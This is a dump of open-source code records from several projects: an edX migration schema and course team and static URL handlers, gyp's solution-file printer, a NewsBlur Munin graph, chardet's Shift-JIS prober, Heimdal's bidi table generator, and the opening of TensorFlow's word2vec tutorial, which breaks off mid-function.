'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'student.anonymoususerid': {
'Meta': {'object_name': 'AnonymousUserId'},
'anonymous_user_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.courseaccessrole': {
'Meta': {'unique_together': "(('user', 'org', 'course_id', 'role'),)", 'object_name': 'CourseAccessRole'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'org': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '64', 'blank': 'True'}),
'role': ('django.db.models.fields.CharField', [], {'max_length': '64', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.courseenrollment': {
'Meta': {'ordering': "('user', 'course_id')", 'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.courseenrollmentallowed': {
'Meta': {'unique_together': "(('email', 'course_id'),)", 'object_name': 'CourseEnrollmentAllowed'},
'auto_enroll': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'student.loginfailures': {
'Meta': {'object_name': 'LoginFailures'},
'failure_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lockout_until': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.passwordhistory': {
'Meta': {'object_name': 'PasswordHistory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'time_set': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.pendingemailchange': {
'Meta': {'object_name': 'PendingEmailChange'},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_email': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.pendingnamechange': {
'Meta': {'object_name': 'PendingNameChange'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'rationale': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.registration': {
'Meta': {'object_name': 'Registration', 'db_table': "'auth_registration'"},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.userprofile': {
'Meta': {'object_name': 'UserProfile', 'db_table': "'auth_userprofile'"},
'allow_certificate': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'city': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
'courseware': ('django.db.models.fields.CharField', [], {'default': "'course.xml'", 'max_length': '255', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '6', 'null': 'True', 'blank': 'True'}),
'goals': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'level_of_education': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '6', 'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'mailing_address': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'meta': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': "orm['auth.User']"}),
'year_of_birth': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'})
},
'student.usersignupsource': {
'Meta': {'object_name': 'UserSignupSource'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.userstanding': {
'Meta': {'object_name': 'UserStanding'},
'account_status': ('django.db.models.fields.CharField', [], {'max_length': '31', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'standing_last_changed_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'standing'", 'unique': 'True', 'to': "orm['auth.User']"})
},
'student.usertestgroup': {
'Meta': {'object_name': 'UserTestGroup'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'db_index': 'True', 'symmetrical': 'False'})
}
}
complete_apps = ['student']
| agpl-3.0 |
enclose-io/compiler | lts/deps/npm/node_modules/node-gyp/gyp/tools/pretty_sln.py | 11 | 5161 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Prints the information in a sln file in a diffable way.
It first outputs each projects in alphabetical order with their
dependencies.
Then it outputs a possible build order.
"""
from __future__ import print_function
import os
import re
import sys
import pretty_vcproj
__author__ = 'nsylvain (Nicolas Sylvain)'
def BuildProject(project, built, projects, deps):
# if all dependencies are done, we can build it, otherwise we try to build the
# dependency.
# This is not infinite-recursion proof.
for dep in deps[project]:
if dep not in built:
BuildProject(dep, built, projects, deps)
print(project)
built.append(project)
def ParseSolution(solution_file):
# All projects, their clsid and paths.
projects = dict()
# A list of dependencies associated with a project.
dependencies = dict()
# Regular expressions that matches the SLN format.
# The first line of a project definition.
begin_project = re.compile(r'^Project\("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942'
r'}"\) = "(.*)", "(.*)", "(.*)"$')
# The last line of a project definition.
end_project = re.compile('^EndProject$')
# The first line of a dependency list.
begin_dep = re.compile(
r'ProjectSection\(ProjectDependencies\) = postProject$')
# The last line of a dependency list.
end_dep = re.compile('EndProjectSection$')
# A line describing a dependency.
dep_line = re.compile(' *({.*}) = ({.*})$')
in_deps = False
solution = open(solution_file)
for line in solution:
results = begin_project.search(line)
if results:
# Hack to remove icu because the diff is too different.
if results.group(1).find('icu') != -1:
continue
# We remove "_gyp" from the names because it helps to diff them.
current_project = results.group(1).replace('_gyp', '')
projects[current_project] = [results.group(2).replace('_gyp', ''),
results.group(3),
results.group(2)]
dependencies[current_project] = []
continue
results = end_project.search(line)
if results:
current_project = None
continue
results = begin_dep.search(line)
if results:
in_deps = True
continue
results = end_dep.search(line)
if results:
in_deps = False
continue
results = dep_line.search(line)
if results and in_deps and current_project:
dependencies[current_project].append(results.group(1))
continue
# Change all dependencies clsid to name instead.
for project in dependencies:
# For each dependencies in this project
new_dep_array = []
for dep in dependencies[project]:
# Look for the project name matching this cldis
for project_info in projects:
if projects[project_info][1] == dep:
new_dep_array.append(project_info)
dependencies[project] = sorted(new_dep_array)
return (projects, dependencies)
def PrintDependencies(projects, deps):
print("---------------------------------------")
print("Dependencies for all projects")
print("---------------------------------------")
print("-- --")
for (project, dep_list) in sorted(deps.items()):
print("Project : %s" % project)
print("Path : %s" % projects[project][0])
if dep_list:
for dep in dep_list:
print(" - %s" % dep)
print("")
print("-- --")
def PrintBuildOrder(projects, deps):
print("---------------------------------------")
print("Build order ")
print("---------------------------------------")
print("-- --")
built = []
for (project, _) in sorted(deps.items()):
if project not in built:
BuildProject(project, built, projects, deps)
print("-- --")
def PrintVCProj(projects):
for project in projects:
print("-------------------------------------")
print("-------------------------------------")
print(project)
print(project)
print(project)
print("-------------------------------------")
print("-------------------------------------")
project_path = os.path.abspath(os.path.join(os.path.dirname(sys.argv[1]),
projects[project][2]))
pretty = pretty_vcproj
argv = [ '',
project_path,
'$(SolutionDir)=%s\\' % os.path.dirname(sys.argv[1]),
]
argv.extend(sys.argv[3:])
pretty.main(argv)
def main():
# check if we have exactly 1 parameter.
if len(sys.argv) < 2:
print('Usage: %s "c:\\path\\to\\project.sln"' % sys.argv[0])
return 1
(projects, deps) = ParseSolution(sys.argv[1])
PrintDependencies(projects, deps)
PrintBuildOrder(projects, deps)
if '--recursive' in sys.argv:
PrintVCProj(projects)
return 0
if __name__ == '__main__':
sys.exit(main())
| mit |
lucidbard/NewsBlur | utils/munin/newsblur_users.py | 14 | 1259 | #!/usr/bin/env python
from utils.munin.base import MuninGraph
class NBMuninGraph(MuninGraph):
@property
def graph_config(self):
return {
'graph_category' : 'NewsBlur',
'graph_title' : 'NewsBlur Users',
'graph_vlabel' : 'users',
'graph_args' : '-l 0',
'all.label': 'all',
'monthly.label': 'monthly',
'daily.label': 'daily',
'premium.label': 'premium',
'queued.label': 'queued',
}
def calculate_metrics(self):
import datetime
from django.contrib.auth.models import User
from apps.profile.models import Profile, RNewUserQueue
last_month = datetime.datetime.utcnow() - datetime.timedelta(days=30)
last_day = datetime.datetime.utcnow() - datetime.timedelta(minutes=60*24)
return {
'all': User.objects.count(),
'monthly': Profile.objects.filter(last_seen_on__gte=last_month).count(),
'daily': Profile.objects.filter(last_seen_on__gte=last_day).count(),
'premium': Profile.objects.filter(is_premium=True).count(),
'queued': RNewUserQueue.user_count(),
}
if __name__ == '__main__':
NBMuninGraph().run()
| mit |
vebin/Wox | PythonHome/Lib/site-packages/chardet/sjisprober.py | 1777 | 3764 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import SJISDistributionAnalysis
from .jpcntx import SJISContextAnalysis
from .mbcssm import SJISSMModel
from . import constants
class SJISProber(MultiByteCharSetProber):
def __init__(self):
MultiByteCharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(SJISSMModel)
self._mDistributionAnalyzer = SJISDistributionAnalysis()
self._mContextAnalyzer = SJISContextAnalysis()
self.reset()
def reset(self):
MultiByteCharSetProber.reset(self)
self._mContextAnalyzer.reset()
def get_charset_name(self):
return self._mContextAnalyzer.get_charset_name()
def feed(self, aBuf):
aLen = len(aBuf)
for i in range(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mContextAnalyzer.feed(self._mLastChar[2 - charLen:],
charLen)
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mContextAnalyzer.feed(aBuf[i + 1 - charLen:i + 3
- charLen], charLen)
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mContextAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
contxtCf = self._mContextAnalyzer.get_confidence()
distribCf = self._mDistributionAnalyzer.get_confidence()
return max(contxtCf, distribCf)
| mit |
geekaia/edx-platform | cms/djangoapps/contentstore/views/user.py | 27 | 7158 | from django.core.exceptions import PermissionDenied
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from django.views.decorators.http import require_http_methods
from django.utils.translation import ugettext as _
from django.views.decorators.http import require_POST
from django_future.csrf import ensure_csrf_cookie
from edxmako.shortcuts import render_to_response
from xmodule.modulestore.django import modulestore
from opaque_keys.edx.keys import CourseKey
from util.json_request import JsonResponse, expect_json
from student.roles import CourseInstructorRole, CourseStaffRole
from course_creators.views import user_requested_access
from .access import has_course_access
from student.models import CourseEnrollment
from django.http import HttpResponseNotFound
from student import auth
__all__ = ['request_course_creator', 'course_team_handler']
@require_POST
@login_required
def request_course_creator(request):
"""
User has requested course creation access.
"""
user_requested_access(request.user)
return JsonResponse({"Status": "OK"})
# pylint: disable=unused-argument
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT", "DELETE"))
def course_team_handler(request, course_key_string=None, email=None):
"""
The restful handler for course team users.
GET
html: return html page for managing course team
json: return json representation of a particular course team member (email is required).
POST or PUT
json: modify the permissions for a particular course team member (email is required, as well as role in the payload).
DELETE:
json: remove a particular course team member from the course team (email is required).
"""
course_key = CourseKey.from_string(course_key_string) if course_key_string else None
if not has_course_access(request.user, course_key):
raise PermissionDenied()
if 'application/json' in request.META.get('HTTP_ACCEPT', 'application/json'):
return _course_team_user(request, course_key, email)
elif request.method == 'GET': # assume html
return _manage_users(request, course_key)
else:
return HttpResponseNotFound()
def _manage_users(request, course_key):
"""
This view will return all CMS users who are editors for the specified course
"""
# check that logged in user has permissions to this item
if not has_course_access(request.user, course_key):
raise PermissionDenied()
course_module = modulestore().get_course(course_key)
instructors = CourseInstructorRole(course_key).users_with_role()
# the page only lists staff and assumes they're a superset of instructors. Do a union to ensure.
staff = set(CourseStaffRole(course_key).users_with_role()).union(instructors)
return render_to_response('manage_users.html', {
'context_course': course_module,
'staff': staff,
'instructors': instructors,
'allow_actions': has_course_access(request.user, course_key, role=CourseInstructorRole),
})
@expect_json
def _course_team_user(request, course_key, email):
"""
Handle the add, remove, promote, demote requests ensuring the requester has authority
"""
# check that logged in user has permissions to this item
if has_course_access(request.user, course_key, role=CourseInstructorRole):
# instructors have full permissions
pass
elif has_course_access(request.user, course_key, role=CourseStaffRole) and email == request.user.email:
# staff can only affect themselves
pass
else:
msg = {
"error": _("Insufficient permissions")
}
return JsonResponse(msg, 400)
try:
user = User.objects.get(email=email)
except Exception:
msg = {
"error": _("Could not find user by email address '{email}'.").format(email=email),
}
return JsonResponse(msg, 404)
# role hierarchy: globalstaff > "instructor" > "staff" (in a course)
if request.method == "GET":
# just return info about the user
msg = {
"email": user.email,
"active": user.is_active,
"role": None,
}
# what's the highest role that this user has? (How should this report global staff?)
for role in [CourseInstructorRole(course_key), CourseStaffRole(course_key)]:
if role.has_user(user):
msg["role"] = role.ROLE
break
return JsonResponse(msg)
# can't modify an inactive user
if not user.is_active:
msg = {
"error": _('User {email} has registered but has not yet activated his/her account.').format(email=email),
}
return JsonResponse(msg, 400)
if request.method == "DELETE":
try:
try_remove_instructor(request, course_key, user)
except CannotOrphanCourse as oops:
return JsonResponse(oops.msg, 400)
auth.remove_users(request.user, CourseStaffRole(course_key), user)
return JsonResponse()
# all other operations require the requesting user to specify a role
role = request.json.get("role", request.POST.get("role"))
if role is None:
return JsonResponse({"error": _("`role` is required")}, 400)
if role == "instructor":
if not has_course_access(request.user, course_key, role=CourseInstructorRole):
msg = {
"error": _("Only instructors may create other instructors")
}
return JsonResponse(msg, 400)
auth.add_users(request.user, CourseInstructorRole(course_key), user)
# auto-enroll the course creator in the course so that "View Live" will work.
CourseEnrollment.enroll(user, course_key)
elif role == "staff":
# add to staff regardless (can't do after removing from instructors as will no longer
# be allowed)
auth.add_users(request.user, CourseStaffRole(course_key), user)
try:
try_remove_instructor(request, course_key, user)
except CannotOrphanCourse as oops:
return JsonResponse(oops.msg, 400)
# auto-enroll the course creator in the course so that "View Live" will work.
CourseEnrollment.enroll(user, course_key)
return JsonResponse()
class CannotOrphanCourse(Exception):
"""
Exception raised if an attempt is made to remove all responsible instructors from course.
"""
def __init__(self, msg):
self.msg = msg
Exception.__init__(self)
def try_remove_instructor(request, course_key, user):
# remove all roles in this course from this user: but fail if the user
# is the last instructor in the course team
instructors = CourseInstructorRole(course_key)
if instructors.has_user(user):
if instructors.users_with_role().count() == 1:
msg = {"error": _("You may not remove the last instructor from a course")}
raise CannotOrphanCourse(msg)
else:
auth.remove_users(request.user, instructors, user)
| agpl-3.0 |
kernevil/samba | source4/heimdal/lib/wind/gen-bidi.py | 6 | 3258 | #!/usr/local/bin/python
# -*- coding: iso-8859-1 -*-
# $Id$
# Copyright (c) 2004 Kungliga Tekniska Högskolan
# (Royal Institute of Technology, Stockholm, Sweden).
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the Institute nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE INSTITUTE AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE INSTITUTE OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
import re
import string
import sys
import generate
import rfc3454
if len(sys.argv) != 3:
print("usage: %s rfc3454.txt outdir" % sys.argv[0])
sys.exit(1)
tables = rfc3454.read(sys.argv[1])
bidi_h = generate.Header('%s/bidi_table.h' % sys.argv[2])
bidi_c = generate.Implementation('%s/bidi_table.c' % sys.argv[2])
bidi_h.file.write(
'''
#include <krb5-types.h>
struct range_entry {
uint32_t start;
unsigned len;
};
extern const struct range_entry _wind_ral_table[];
extern const struct range_entry _wind_l_table[];
extern const size_t _wind_ral_table_size;
extern const size_t _wind_l_table_size;
''')
bidi_c.file.write(
'''
#include "bidi_table.h"
#include <stdlib.h>
''')
def printTable(file, table, variable):
"""print table to file named as variable"""
file.write("const struct range_entry %s[] = {\n" % variable)
count = 0
for l in tables[table]:
m = re.search('^ *([0-9A-F]+)-([0-9A-F]+) *$', l)
if m:
start = int(m.group(1), 0x10)
end = int(m.group(2), 0x10)
file.write(" {0x%x, 0x%x},\n" % (start, end - start + 1))
count += 1
else:
m = re.search('^ *([0-9A-F]+) *$', l)
if m:
v = int(m.group(1), 0x10)
file.write(" {0x%x, 1},\n" % v)
count += 1
file.write("};\n\n")
file.write("const size_t %s_size = %u;\n\n" % (variable, count))
printTable(bidi_c.file, 'D.1', '_wind_ral_table')
printTable(bidi_c.file, 'D.2', '_wind_l_table')
bidi_h.close()
bidi_c.close()
| gpl-3.0 |
naresh21/synergetics-edx-platform | common/djangoapps/static_replace/__init__.py | 22 | 8453 | import logging
import re
from django.contrib.staticfiles.storage import staticfiles_storage
from django.contrib.staticfiles import finders
from django.conf import settings
from static_replace.models import AssetBaseUrlConfig, AssetExcludedExtensionsConfig
from xmodule.modulestore.django import modulestore
from xmodule.modulestore import ModuleStoreEnum
from xmodule.contentstore.content import StaticContent
from opaque_keys.edx.locator import AssetLocator
log = logging.getLogger(__name__)
XBLOCK_STATIC_RESOURCE_PREFIX = '/static/xblock'
def _url_replace_regex(prefix):
"""
Match static urls in quotes that don't end in '?raw'.
To anyone contemplating making this more complicated:
http://xkcd.com/1171/
"""
return ur"""
(?x) # flags=re.VERBOSE
(?P<quote>\\?['"]) # the opening quotes
(?P<prefix>{prefix}) # the prefix
(?P<rest>.*?) # everything else in the url
(?P=quote) # the first matching closing quote
""".format(prefix=prefix)
def try_staticfiles_lookup(path):
"""
Try to lookup a path in staticfiles_storage. If it fails, return
a dead link instead of raising an exception.
"""
try:
url = staticfiles_storage.url(path)
except Exception as err:
log.warning("staticfiles_storage couldn't find path {0}: {1}".format(
path, str(err)))
# Just return the original path; don't kill everything.
url = path
return url
def replace_jump_to_id_urls(text, course_id, jump_to_id_base_url):
"""
This will replace a link to another piece of courseware to a 'jump_to'
URL that will redirect to the right place in the courseware
NOTE: This is similar to replace_course_urls in terms of functionality
but it is intended to be used when we only have a 'id' that the
course author provides. This is much more helpful when using
Studio authored courses since they don't need to know the path. This
is also durable with respect to item moves.
text: The content over which to perform the subtitutions
course_id: The course_id in which this rewrite happens
jump_to_id_base_url:
A app-tier (e.g. LMS) absolute path to the base of the handler that will perform the
redirect. e.g. /courses/<org>/<course>/<run>/jump_to_id. NOTE the <id> will be appended to
the end of this URL at re-write time
output: <text> after the link rewriting rules are applied
"""
def replace_jump_to_id_url(match):
quote = match.group('quote')
rest = match.group('rest')
return "".join([quote, jump_to_id_base_url + rest, quote])
return re.sub(_url_replace_regex('/jump_to_id/'), replace_jump_to_id_url, text)
def replace_course_urls(text, course_key):
"""
Replace /course/$stuff urls with /courses/$course_id/$stuff urls
text: The text to replace
course_module: A CourseDescriptor
returns: text with the links replaced
"""
course_id = course_key.to_deprecated_string()
def replace_course_url(match):
quote = match.group('quote')
rest = match.group('rest')
return "".join([quote, '/courses/' + course_id + '/', rest, quote])
return re.sub(_url_replace_regex('/course/'), replace_course_url, text)
def process_static_urls(text, replacement_function, data_dir=None):
"""
Run an arbitrary replacement function on any urls matching the static file
directory
"""
def wrap_part_extraction(match):
"""
Unwraps a match group for the captures specified in _url_replace_regex
and forward them on as function arguments
"""
original = match.group(0)
prefix = match.group('prefix')
quote = match.group('quote')
rest = match.group('rest')
# Don't rewrite XBlock resource links. Probably wasn't a good idea that /static
# works for actual static assets and for magical course asset URLs....
full_url = prefix + rest
starts_with_static_url = full_url.startswith(unicode(settings.STATIC_URL))
starts_with_prefix = full_url.startswith(XBLOCK_STATIC_RESOURCE_PREFIX)
contains_prefix = XBLOCK_STATIC_RESOURCE_PREFIX in full_url
if starts_with_prefix or (starts_with_static_url and contains_prefix):
return original
return replacement_function(original, prefix, quote, rest)
return re.sub(
_url_replace_regex(u'(?:{static_url}|/static/)(?!{data_dir})'.format(
static_url=settings.STATIC_URL,
data_dir=data_dir
)),
wrap_part_extraction,
text
)
def make_static_urls_absolute(request, html):
"""
Converts relative URLs referencing static assets to absolute URLs
"""
def replace(__, prefix, quote, rest):
"""
Function to actually do a single relative -> absolute url replacement
"""
processed = request.build_absolute_uri(prefix + rest)
return quote + processed + quote
return process_static_urls(
html,
replace
)
def replace_static_urls(text, data_directory=None, course_id=None, static_asset_path=''):
"""
Replace /static/$stuff urls either with their correct url as generated by collectstatic,
(/static/$md5_hashed_stuff) or by the course-specific content static url
/static/$course_data_dir/$stuff, or, if course_namespace is not None, by the
correct url in the contentstore (/c4x/.. or /asset-loc:..)
text: The source text to do the substitution in
data_directory: The directory in which course data is stored
course_id: The course identifier used to distinguish static content for this course in studio
static_asset_path: Path for static assets, which overrides data_directory and course_namespace, if nonempty
"""
def replace_static_url(original, prefix, quote, rest):
"""
Replace a single matched url.
"""
# Don't mess with things that end in '?raw'
if rest.endswith('?raw'):
return original
# In debug mode, if we can find the url as is,
if settings.DEBUG and finders.find(rest, True):
return original
# if we're running with a MongoBacked store course_namespace is not None, then use studio style urls
elif (not static_asset_path) and course_id:
# first look in the static file pipeline and see if we are trying to reference
# a piece of static content which is in the edx-platform repo (e.g. JS associated with an xmodule)
exists_in_staticfiles_storage = False
try:
exists_in_staticfiles_storage = staticfiles_storage.exists(rest)
except Exception as err:
log.warning("staticfiles_storage couldn't find path {0}: {1}".format(
rest, str(err)))
if exists_in_staticfiles_storage:
url = staticfiles_storage.url(rest)
else:
# if not, then assume it's courseware specific content and then look in the
# Mongo-backed database
base_url = AssetBaseUrlConfig.get_base_url()
excluded_exts = AssetExcludedExtensionsConfig.get_excluded_extensions()
url = StaticContent.get_canonicalized_asset_path(course_id, rest, base_url, excluded_exts)
if AssetLocator.CANONICAL_NAMESPACE in url:
url = url.replace('block@', 'block/', 1)
# Otherwise, look the file up in staticfiles_storage, and append the data directory if needed
else:
course_path = "/".join((static_asset_path or data_directory, rest))
try:
if staticfiles_storage.exists(rest):
url = staticfiles_storage.url(rest)
else:
url = staticfiles_storage.url(course_path)
# And if that fails, assume that it's course content, and add manually data directory
except Exception as err:
log.warning("staticfiles_storage couldn't find path {0}: {1}".format(
rest, str(err)))
url = "".join([prefix, course_path])
return "".join([quote, url, quote])
return process_static_urls(text, replace_static_url, data_dir=static_asset_path or data_directory)
| agpl-3.0 |
tntnatbry/tensorflow | tensorflow/examples/tutorials/word2vec/word2vec_basic.py | 5 | 9272 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import math
import os
import random
import zipfile
import numpy as np
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
# Step 1: Download the data.
url = 'http://mattmahoney.net/dc/'
def maybe_download(filename, expected_bytes):
"""Download a file if not present, and make sure it's the right size."""
if not os.path.exists(filename):
filename, _ = urllib.request.urlretrieve(url + filename, filename)
statinfo = os.stat(filename)
if statinfo.st_size == expected_bytes:
print('Found and verified', filename)
else:
